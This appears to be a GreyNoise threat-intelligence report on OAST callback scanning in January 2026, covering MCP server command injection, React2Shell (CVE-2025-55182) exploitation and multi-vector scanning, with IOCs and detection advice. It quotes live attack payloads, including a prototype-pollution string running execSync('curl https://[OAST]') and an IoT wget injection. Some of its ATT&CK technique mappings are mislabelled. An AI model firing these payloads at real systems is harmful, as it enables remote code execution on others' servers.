Full Report
GreyNoise observed 30,165 sessions from 64 unique IP addresses containing Well-known Out-of-band Interaction Domains during the week of January 3-9, 2026. Analysis reveals three distinct operational clusters: a high-volume MCP server command injection campaign from a single OVH IP (51[.]77[.]116[.]46), a coordinated React2Shell (CVE-2025-55182) exploitation effort spanning four IPs across three ASNs, and opportunistic multi-vector scanning from MEVSPACE infrastructure. All activity utilized Interactsh domains across six provider TLDs, with 44 distinct OAST campaign identifiers decoded from 3,464 unique callback domains. Overview This analysis covers OAST-tagged sessions observed across GreyNoise sensor infrastructure from January 3-9, 2026. The data was extracted from sessions tagged with “Contains Well-known Out-of-band Interaction Domain” and analyzed using JA4 fingerprinting, OAST domain decoding, and payload classification. Session volume peaked on January 4 with 17,520 sessions (58% of weekly total), driven primarily by IP 51[.]77[.]116[.]46 which contributed 12,371 sessions on that single day. The temporal distribution shows sustained activity throughout the week with no significant gaps exceeding 24 hours, suggesting continuous automated scanning rather than manual operation. JA4T fingerprint analysis identified two dominant TCP stack signatures: 64240_2-4-8-1-3_1460_7 (4,846 sessions, 17 IPs) - Standard Linux/WSL profile 65495_2-4-8-1-3_65495_7 (3,865 sessions, 24 IPs) - Non-standard MSS indicating tunneled or virtualized networking The MSS 65495 fingerprint correlates with activity from known bulletproof hosting providers including MEVSPACE (AS201814) and appears across multiple campaigns, suggesting shared infrastructure or tooling. Campaign Analysis Campaign 1: MCP Server Command Injection (j332t) Attribute Value Sessions 1,245 Unique IPs 1 Source IP 51.77.116.46 ASN AS16276 (OVH SAS) OAST Provider oast.site First Seen 2026-01-04 07:38:54 UTC Last Seen 2026-01-04 (single day burst) This campaign targets MCP (Model Context Protocol) server configurations with command injection payloads (Flowise Authentication Bypass CVE-2025-8943 RCE Attempt | GreyNoise Visualizer). The attack attempts to abuse the mcpServerConfig parameter to execute arbitrary commands via ping callbacks to OAST domains. Sample Payload: { "inputs": { "mcpServerConfig": { "command": "ping", "args": ["d5d1gpj332t74modlrfg[REDACTED].oast.site", "-c", "1"] } } } The decoded OAST domain reveals: Timestamp: 2026-01-04 02:36:06 EST Machine ID: 63:18:ba Campaign identifier: j332t This single-IP campaign generated high volume within a compressed timeframe, consistent with automated vulnerability scanning behavior. Campaign 2: React2Shell Exploitation (qsuzo) Attribute Value Sessions 1,044 Unique IPs 4 ASNs AS13335 (Cloudflare), AS60223 (Netiface), AS3243 (MEO) Countries Portugal, Netherlands OAST Provider oast.fun Date Range 2026-01-04 to 2026-01-09 This campaign exploits CVE-2025-55182 (React Server Components Unsafe Deserialization CVE-2025-55182 RCE Attempt | GreyNoise Visualizer) using prototype pollution to achieve remote code execution via child_process.execSync(). IP Distribution: | IP | ASN | Sessions | |—-|—–|———-| | 195[.]24[.]237[.]218 | AS60223 | 604 | | 104[.]28[.]246[.]4 | AS13335 | 302 | | 82[.]154[.]215[.]52 | AS3243 | 84 | | 104[.]28[.]214[.]4 | AS13335 | 54 | The presence of Cloudflare IPs (AS13335) suggests either proxied traffic or Cloudflare Workers-based attack infrastructure. The Netiface IP (195[.]24[.]237[.]218) contributed the majority of sessions. Payload Pattern: {\"then\": \"$1:__proto__:then\", \"status\": \"resolved_model\", \"reason\": -1, \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\", \"_response\": {\"_prefix\": \"var res=process.mainModule.require('child_process').execSync('curl https://[OAST]')\"}} Campaign 3: Multi-Vector MEVSPACE Scanning Attribute Value Sessions 4,160 Source IP 94[.]26[.]88[.]61 ASN AS201814 (MEVSPACE) Country Poland Attack Types XStream, .NET Deserialization, Log4Shell OAST Providers Multiple (oast.site, oast.online, oast.pro) MEVSPACE sp. z o.o. is a known bulletproof hosting provider. This IP executed multiple exploit types across the analysis window: Attack Type Distribution from 94[.]26[.]88[.]61: | Attack Type | Sessions | |————-|———-| | XStream Deserialization | 144 | | .NET JSON Deserialization | 93 | | Log4Shell (CVE-2021-44228) | 287 | | Other callback attempts | 3,636 | The diversity of attack payloads from a single source suggests an automated vulnerability scanner cycling through multiple exploit modules. Additional Activity Google Cloud Infrastructure (AS396982) Fifteen unique IPs from Google Cloud (AS396982) contributed scanning activity, primarily from Netherlands-based instances. The consistent JA4T fingerprint 65320_2-4-8-1-3_1420_7 across these IPs suggests a shared deployment or tooling: IP Sessions 34[.]32[.]217[.]222 245 34[.]91[.]156[.]181 124 34[.]91[.]29[.]122 118 34[.]91[.]237[.]187 115 (11 others) IoT Command Injection Seventeen sessions from seven unique IPs targeted IoT device command injection endpoints (e.g., /syscmd.htm). Sample payload: submit-url=%2Fsyscmd.htm&sysCmdselect=5&save_apply=Run+Command&sysCmd=wget+http://[OAST].oast.pro This activity was distributed across residential and hosting ASNs with no clear clustering. Infrastructure Analysis JA4 Fingerprint Clusters JA4T JA4H Sessions IPs Infrastructure Type 64240_2-4-8-1-3_1460_7 ge11nn06en00_0e5d97bc8ad6 1,088 5 Standard Linux 65495_2-4-8-1-3_65495_7 ge11nn06en00_0e5d97bc8ad6 886 7 Tunneled/Virtual 64240_2-4-8-1-3_1460_7 po11nn060000_4ea4093e6290 622 8 Standard Linux 65495_2-4-8-1-3_65495_7 po11nn060000_4ea4093e6290 550 12 Tunneled/Virtual The same JA4H fingerprints appearing with both standard and non-standard JA4T values indicates the same HTTP tooling deployed across different network environments. OAST Provider Distribution Provider Unique Domains oast.site 1,618 oast.online 658 oast.me 473 oast.fun 261 oast.pro 257 oast.live 195 dnslog.cn 2 All providers are Interactsh infrastructure except for 2 dnslog.cn domains. The use of multiple Interactsh TLDs within single campaigns suggests operational security measures to avoid domain-based blocking. Attribution Assessment Confidence: Medium The three primary campaigns show distinct operational characteristics: j332t (MCP Server): Single IP, single day, novel attack vector targeting AI/LLM infrastructure. The specificity of the payload suggests an operator with knowledge of MCP protocol implementations. OVH hosting provides limited attribution value. qsuzo (React2Shell): Multi-IP coordination across three ASNs suggests either a distributed scanning framework or an initial access broker operation. The use of Cloudflare edge IPs complicates origin attribution. MEVSPACE activity: Bulletproof hosting origin is consistent with professional scanning operations. The multi-vector approach suggests automated vulnerability assessment tooling rather than targeted exploitation. The decoded OAST campaign identifiers (44 unique) do not show clear correlation between otherwise distinct fingerprint clusters, suggesting these campaigns are operationally independent. Network IOCs Primary IPs (>200 sessions) IP ASN Org Sessions 51[.]77[.]116[.]46 AS16276 OVH SAS 16,814 94[.]26[.]88[.]61 AS201814 MEVSPACE 4,160 195[.]24[.]237[.]218 AS60223 Netiface 1,952 104[.]28[.]246[.]4 AS13335 Cloudflare 944 209[.]38[.]59[.]248 AS14061 DigitalOcean 763 139[.]59[.]217[.]230 AS14061 DigitalOcean 717 198[.]98[.]61[.]39 AS53667 FranTech 335 188[.]212[.]125[.]110 AS202448 MVPS LTD 328 80[.]191[.]90[.]190 AS58224 Iran Telecom 323 185[.]181[.]183[.]41 AS206596 Iran (CRCIS) 308 JA4 Fingerprints for Detection # JA4T - Non-standard MSS (bulletproof/tunneled) 65495_2-4-8-1-3_65495_7 # JA4T - Standard Linux 64240_2-4-8-1-3_1460_7 # JA4H - Common HTTP signature across campaigns ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 po11nn060000_4ea4093e6290_000000000000_000000000000 Detection Recommendations Block or alert on MSS 65495 TCP connections - This non-standard value is highly anomalous and correlates with bulletproof hosting infrastructure. Monitor for MCP server configuration manipulation - Payloads containing mcpServerConfig with command execution should trigger investigation. Detect React2Shell patterns - Look for __proto__ combined with child_process in request bodies. Prioritize patching for: CVE-2025-55182 (React2Shell) CVE-2021-44228 (Log4Shell) XStream deserialization vulnerabilities Consider blocking Interactsh callback domains at the network perimeter - The oast.* TLDs are rarely used legitimately outside of authorized security testing. GNQL Queries # All OAST activity in the past 7 days tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d # MEVSPACE infrastructure metadata.asn:AS201814 last_seen:7d # React2Shell exploitation attempts cve:CVE-2025-55182 last_seen:7d
Analysis Summary
# Tool/Technique: MCP Server Command Injection (Campaign j332t)
## Overview
This refers to a concentrated command injection attack targeting Model Context Protocol (MCP) server configurations, specifically linked to an alleged authentication bypass vulnerability (CVE-2025-8943). The primary goal is Remote Code Execution (RCE) demonstrated via outbound ping callbacks to an Out-of-Band Application Security Testing (OAST) domain.
## Technical Details
- Type: Technique / Exploitation (Vulnerability Scanning Activity)
- Platform: MCP Server (Likely running Flowise or similar LLM infrastructure)
- Capabilities: Executes system commands embedded within specific JSON payload fields (`mcpServerConfig`).
- First Seen: 2026-01-04 07:38:54 UTC
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0002 - Execution
- T1202 - Command and Scripting Interpreter
## Functionality
### Core Capabilities
- Abuse of the `mcpServerConfig` parameter.
- Execution of arbitrary system commands (e.g., `ping`) to generate an OAST callback.
- Exploitation attributed to **CVE-2025-8943** (Flowise Authentication Bypass RCE Attempt).
### Advanced Features
- High-volume, single-source burst activity (12,371 sessions in one day).
- Use of specific OAST provider (`oast.site`).
- Campaign identifier `j332t` decoded from the callback domain.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Source IP `51[.]77[.]116[.]46`. Callback domains pointing to `*.oast.site`.
- Behavioral Indicators: HTTP POST requests containing the structure `{"inputs": {"mcpServerConfig": {"command": "ping", ...}}}`.
## Associated Threat Actors
Unknown. The activity is attributed to automated scanning by an operator who leveraged OVH infrastructure.
## Detection Methods
- Monitor for HTTP requests containing the parameter `mcpServerConfig` with command execution attempts.
- Monitor for outbound connections originating from web servers to OAST domains, specifically those tagged with `j332t`.
- Alert on TCP connections originating from `51[.]77[.]116[.]46`.
## Mitigation Strategies
- Immediately patch or secure applications handling MCP server configurations against command injection.
- Implement strict input validation and sanitization for all configuration parameters.
- Block outbound callbacks to known OAST infrastructure.
## Related Tools/Techniques
- General Command Injection techniques.
---
# Tool/Technique: React2Shell Exploitation (Campaign qsuzo)
## Overview
This campaign exploits a deserialization vulnerability in React Server Components, tracked as **CVE-2025-55182**, which leads to Remote Code Execution (RCE) via prototype pollution and subsequent execution of shell commands (`child_process.execSync`).
## Technical Details
- Type: Technique / Exploitation (Vulnerability Scanning Activity)
- Platform: JavaScript/Node.js environments running vulnerable React applications.
- Capabilities: Achieves RCE through prototype pollution to manipulate object structure and force execution of Node.js modules like `child_process`.
- First Seen: 2026-01-04
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell
## Functionality
### Core Capabilities
- Exploitation of **CVE-2025-55182** (React Server Components Unsafe Deserialization).
- Uses prototype pollution (`__proto__:then`) payload structure.
- Executes system commands via `process.mainModule.require('child_process').execSync('curl https://[OAST]')`.
### Advanced Features
- Coordinated activity across 4 unique IPs spanning 3 different Autonomous System Numbers (ASNs: AS60223, AS13335, AS3243).
- Traffic potentially proxied through Cloudflare (AS13335).
- Campaign identifier `qsuzo` discovered in callbacks.
- Frequent use of OAST provider `oast.fun`.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Source IPs including `195[.]24[.]237[.]218`, `104[.]28[.]246[.]4`. Callback domains pointing to `*.oast.fun`.
- Behavioral Indicators: HTTP requests containing JSON structures including `"then": "$1:__proto__:then"` and references to `'child_process'`.
## Associated Threat Actors
Unknown. The distributed nature involving Cloudflare suggests use of common, potentially cloud-based, attack tooling.
## Detection Methods
- Signature matching for the specific component payload pattern including `__proto__` and `child_process`.
- Network monitoring for connection success callbacks from `*.oast.fun`.
- Alerting on activity associated with **CVE-2025-55182**.
## Mitigation Strategies
- Patching immediately for **CVE-2025-55182**.
- Review serialization/deserialization logic thoroughly to prevent prototype pollution attacks.
- Limit the capabilities available to child process execution contexts wherever possible.
## Related Tools/Techniques
- Prototype Pollution exploits targeting Node.js applications.
---
# Tool/Technique: Multi-Vector Vulnerability Scanner (Campaign MEVSPACE/Opportunistic)
## Overview
This activity, predominantly originating from infrastructure belonging to the bulletproof hosting provider MEVSPACE (AS201814), characterized a high-volume, multi-vector automated scanning operation attempting to exploit known critical vulnerabilities.
## Technical Details
- Type: Tool / Framework (Vulnerability Scanner)
- Platform: Unknown, targeting multiple software components across victims.
- Capabilities: Simultaneously tests for XStream Deserialization flaws, .NET Deserialization flaws, and Log4Shell (**CVE-2021-44228**), along with other general callback attempts.
- First Seen: Activity spanned the entire observation week (Jan 3-9, 2026).
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0008 - Lateral Movement
- T1090 - Proxy (Implied by use of bulletproof hosting)
## Functionality
### Core Capabilities
- **Log4Shell Exploitation:** Presence of callbacks associated with **CVE-2021-44228**.
- **Deserialization Testing:** Attempts against XStream and .NET JSON deserialization endpoints.
- **Broad Scanning:** High volume of "Other callback attempts" (3,636 sessions), indicating a generic probe for *any* OAST interaction.
### Advanced Features
- Use of infrastructure located in known bulletproof hosting environments (MEVSPACE).
- Correlation with the non-standard Linux/Virtualized TCP fingerprint (`65495_2-4-8-1-3_65495_7`), suggesting usage of specialized, potentially highly obfuscated, scanning agents.
- Utilized multiple Interactsh callback TLDs (`oast.site`, `oast.online`, `oast.pro`) simultaneously.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Source IP `94[.]26[.]88[.]61`.
- Behavioral Indicators: High volume of diverse, weaponized payloads originating from AS201814.
## Associated Threat Actors
Likely professional scanner operators or penetration testing tool developers utilizing bulletproof hosting for anonymity.
## Detection Methods
- Prioritize blocking/alerting traffic from ASN AS201814 (MEVSPACE).
- Detection rules specifically targeting payloads for Log4Shell, XStream, and .NET Deserialization combined with OAST callbacks.
- Alert on the `65495_2-4-8-1-3_65495_7` JA4T fingerprint associated with continuous scanning.
## Mitigation Strategies
- Apply critical patches for **CVE-2021-44228 (Log4Shell)**.
- Implement robust Web Application Firewalls (WAFs) to filter known deserialization patterns.
- Network ACLs to restrict access to vulnerable endpoints.
## Related Tools/Techniques
- Automated vulnerability scanning tools that leverage OAST frameworks like Interactsh for verification.
---
# General Observable: Out-of-Band Application Security Testing (OAST) Infrastructure
## Overview
The activity observed utilized OAST techniques, primarily harnessing Interactsh infrastructure (via domains like `oast.site`, `oast.fun`, etc.) to confirm the success of exploitation attempts by forcing a callback from the target server.
## Technical Details
- Type: Technique / Tooling Component
- Platform: Infrastructure used by attackers/testers (Interactsh)
- Capabilities: Provides ephemeral, verifiable inbound network communication points (DNS, HTTP, etc.) to confirm vulnerability impact, bypassing traditional firewall restrictions.
- First Seen: Continuous throughout the observed window.
## MITRE ATT&CK Mapping
- T1560.003 - Archive Collected Data: Steganography (Used conceptually for encoding/exfiltration confirmation)
- T1071.004 - Application Layer Protocol: DNS (Common callback mechanism)
## Functionality
### Core Capabilities
- Confirmation of Command Execution via callback requests.
- Use of 44 distinct OAST campaign identifiers to track disparate scanning efforts.
- Rotation across six different TLDs for Interactsh domains to evade static blocking lists.
### Advanced Features
- Correlation analysis based on unique campaign identifiers.
- Specific use of the `oast.fun` domain linked exclusively to the React2Shell campaign.
## Indicators of Compromise
- Network Indicators: Any connection to domains ending in `.oast.site`, `.oast.fun`, `.oast.me`, `.oast.pro`, `.oast.live`, or `dnslog.cn`.
## Detection Methods
- **High Priority Recommendation:** Block outbound connections to all Interactsh provider TLDs at the network perimeter unless explicitly whitelisted for authorized testing.
- Monitor internal systems for DNS lookups or HTTP requests to these domains.
## Mitigation Strategies
- Enforce egress filtering to only allow necessary external connectivity.
- Utilize network monitoring tools to track non-standard outbound reconnaissance traffic.
## Related Tools/Techniques
- Interactsh, Canarytokens, Burp Collaborator.